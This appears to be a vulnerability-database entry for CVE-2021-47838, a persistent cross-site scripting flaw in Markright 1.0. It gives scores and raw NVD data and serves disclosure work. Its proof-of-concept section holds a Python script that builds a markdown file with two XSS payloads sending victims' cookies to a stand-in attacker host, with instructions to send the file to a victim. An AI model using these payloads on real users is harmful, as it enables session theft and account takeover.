Security Vulnerability Report
中文
CVE-2021-47838 CVSS 7.2 HIGH

CVE-2021-47838

Published: 2026-01-16 19:16:09
Last Modified: 2026-04-15 00:35:42
Source: [email protected]

Description

Markright 1.0 contains a persistent cross-site scripting vulnerability that allows attackers to embed malicious payloads in markdown files. Attackers can upload specially crafted markdown files that execute arbitrary JavaScript when opened, potentially enabling remote code execution on the victim's system.

CVSS Details

CVSS Score
7.2
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Markright < 1.0 (受影响)
Markright = 1.0 (确认受影响)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3 # CVE-2021-47838 PoC - Markright Persistent XSS # This PoC generates a malicious Markdown file with XSS payload import os def generate_malicious_markdown(): """Generate malicious Markdown file with XSS payload""" # XSS payload - executes JavaScript when file is opened xss_payload = '<script>alert("XSS - CVE-2021-47838"); document.location="https://attacker.com/steal?cookie="+document.cookie;</script>' # Alternative payload using img onerror alt_payload = '<img src=x onerror="fetch('https://attacker.com/log?c='+document.cookie)">' # Create malicious markdown content malicious_content = f'''# Normal Looking Document This is a legitimate Markdown document. {xss_payload} ## Section 2 More content here... {alt_payload} --- *End of document* ''' return malicious_content def save_payload(filename="exploit.md"): """Save the malicious markdown file""" content = generate_malicious_markdown() with open(filename, 'w', encoding='utf-8') as f: f.write(content) print(f"[+] Malicious Markdown file created: {filename}") print(f"[+] File size: {len(content)} bytes") return filename if __name__ == "__main__": print("=" * 50) print("CVE-2021-47838 - Markright XSS PoC Generator") print("=" * 50) filename = save_payload() print(f"\n[!] Send this file to victim and have them open it in Markright") print(f"[!] When opened, the XSS payload will execute JavaScript")

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47838", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:09.380", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Markright 1.0 contains a persistent cross-site scripting vulnerability that allows attackers to embed malicious payloads in markdown files. Attackers can upload specially crafted markdown files that execute arbitrary JavaScript when opened, potentially enabling remote code execution on the victim's system."}, {"lang": "es", "value": "Markright 1.0 contiene una vulnerabilidad de cross-site scripting persistente que permite a los atacantes incrustar cargas útiles maliciosas en archivos markdown. Los atacantes pueden subir archivos markdown especialmente diseñados que ejecutan JavaScript arbitrario al abrirse, lo que podría permitir la ejecución remota de código en el sistema de la víctima."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N", "baseScore": 7.2, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://github.com/dvcrn/markright", "source": "[email protected]"}, {"url": "https://imgur.com/a/VOsgKbZ", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/49834", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/markright-persistent-cross-site-scripting", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/markright-persistent-cross-site-scripting", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.